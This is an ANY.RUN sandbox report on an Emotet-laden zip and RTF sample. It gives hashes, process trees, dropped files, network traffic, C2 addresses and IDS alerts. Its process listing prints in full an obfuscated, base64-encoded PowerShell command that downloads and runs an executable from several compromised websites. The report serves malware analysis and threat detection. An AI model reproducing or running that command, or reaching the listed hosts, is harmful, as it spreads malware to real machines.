analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7fc9d667d93145a726de.zip

Full analysis: https://app.any.run/tasks/9fc22f3e-aa51-445d-b0b7-1952b1da5651
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 18, 2019, 15:26:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet
trojan
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

02F93512E707CB86ED027FAFEED2F5E6

SHA1:

00BBBE060C33FEC9AFC2B915CE4E7800B4C761E5

SHA256:

E3B86E4B26E65FC6F8EA29EDFAC3F88790FD578F0A0D4FF62293E7251C291BF1

SSDEEP:

3072:0Hvn9W90aPKyZUj8oCPJBXOZjQ5uCGSNKYnE3875pfOQI2xcnrp7uK/VgdTKsTBe:Kvn0vKq1oMe1Q7GSNtEM7Lfzxcj9gdT0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 523.exe (PID: 2572)
      • 523.exe (PID: 3336)
      • 523.exe (PID: 2660)
      • easywindow.exe (PID: 3832)
      • 523.exe (PID: 3524)
      • easywindow.exe (PID: 3908)
      • easywindow.exe (PID: 1132)
      • easywindow.exe (PID: 2880)

    • Emotet process was detected

      • 523.exe (PID: 3524)

    • EMOTET was detected

      • easywindow.exe (PID: 2880)

    • Changes the autorun value in the registry

      • easywindow.exe (PID: 2880)

    • Connects to CnC server

      • easywindow.exe (PID: 2880)

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3040)

    • PowerShell script executed

      • powershell.exe (PID: 3040)

    • Creates files in the user directory

      • powershell.exe (PID: 3040)

    • Application launched itself

      • 523.exe (PID: 2660)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3040)
      • 523.exe (PID: 3524)

    • Starts itself from another location

      • 523.exe (PID: 3524)

  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3228)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3228)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:09:18 15:26:10
ZipCRC: 0xa81cb7f9
ZipCompressedSize: 148624
ZipUncompressedSize: 272640
ZipFileName: 7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.bin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
11
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs winword.exe no specs powershell.exe 523.exe no specs 523.exe no specs 523.exe no specs #EMOTET 523.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3544"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\7fc9d667d93145a726de.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3228"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3040powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3336"C:\Users\admin\523.exe" C:\Users\admin\523.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2572"C:\Users\admin\523.exe" C:\Users\admin\523.exe523.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2660--d05e77b4C:\Users\admin\523.exe523.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3524--d05e77b4C:\Users\admin\523.exe
523.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1132"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe523.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3832"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3908--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
3 134
Read events
2 636
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
2
Unknown types
45

Dropped files

PID
Process
Filename
Type
3544WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3544.44410\7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.bin
MD5:
SHA256:
3228WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR1126.tmp.cvr
MD5:
SHA256:
3228WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC0DB8CC.wmfwmf
MD5:471CAE0A8DBA69FE95345531EF1B0ECA
SHA256:BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83
3228WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E238A58E.wmfwmf
MD5:D380A71A1B03203B26489F70EB320A64
SHA256:DD06DE5BAC74F5593922EC5CF92F079655914BED2F2F755F1C91FD8324F6FA2E
3228WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:64ACC42DAE6263A8CD90149E1F478CD9
SHA256:9F349BD46627D00F3510892ED7992CA4BA765AC5A0B65A9B7C391B5257707C89
3228WINWORD.EXEC:\Users\admin\Desktop\~$c9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.rtfpgc
MD5:9926DDF83F763B82C5F809871D9AEF03
SHA256:923CF16F41EF4AE4B189C0289A4A4FC1B7DD9776A9DE6BEDC1417624E4272512
3228WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:1411C5AC7CB5904CAF3FB9623E3B38D6
SHA256:0CAA76A6781CA740A9F4D1A715F9EF07D4EEBCD1F38C0E87219A22DC44093F86
3228WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:FE5518FB557C82325D55D619EA9E645E
SHA256:0693EC0166205AE8069F572B9EF3252CB7B29E24B6204F1E25A5D3BA45989749
3228WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E6E9F55.wmfwmf
MD5:3F88C0B54BF2695896916D49A99233EC
SHA256:B2A537443977561979E19EAC9074421824008C287B2F01AF47A79E72335AA724
3228WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\403FAA5D.wmfwmf
MD5:BA2D6BD46C90B2289E463FC0BB790DBB
SHA256:DCF519D8EAD86232CD5DDA6A019F91E1C9BF08BB2354153E60ADC631B9262312
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2880
easywindow.exe
POST
59.152.93.46:443
http://59.152.93.46:443/entries/site/
BD
malicious
3040
powershell.exe
GET
200
156.67.209.58:80
http://shael.org/cgi-sys/suspendedpage.cgi
SG
html
7.40 Kb
malicious
2880
easywindow.exe
POST
91.92.191.134:8080
http://91.92.191.134:8080/ringin/
IR
malicious
2880
easywindow.exe
POST
200
178.254.6.27:7080
http://178.254.6.27:7080/health/symbols/nsip/merge/
DE
binary
148 b
malicious
3040
powershell.exe
GET
302
156.67.209.58:80
http://shael.org/hosting/TYXchcKkHz/
SG
html
681 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3040
powershell.exe
156.67.209.58:80
shael.org
Hostinger International Limited
SG
unknown
2880
easywindow.exe
185.129.92.210:7080
Bravo Online Systems LLC
AZ
malicious
2880
easywindow.exe
91.92.191.134:8080
Information Technology Company (ITC)
IR
malicious
2880
easywindow.exe
178.254.6.27:7080
EVANZO e-commerce GmbH
DE
malicious
3040
powershell.exe
89.46.105.48:80
www.lottizzazionesavarra.it
Aruba S.p.A.
IT
suspicious
2880
easywindow.exe
59.152.93.46:443
Zipnet Limited DKB AS number
BD
malicious

DNS requests

Domain
IP
Reputation
shael.org
  • 156.67.209.58
malicious
www.lottizzazionesavarra.it
  • 89.46.105.48
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3040
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3040
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
3040
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3040
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2880
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2880
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2880
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2880
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2880
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
8 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
7fc9d667d93145a726de.zip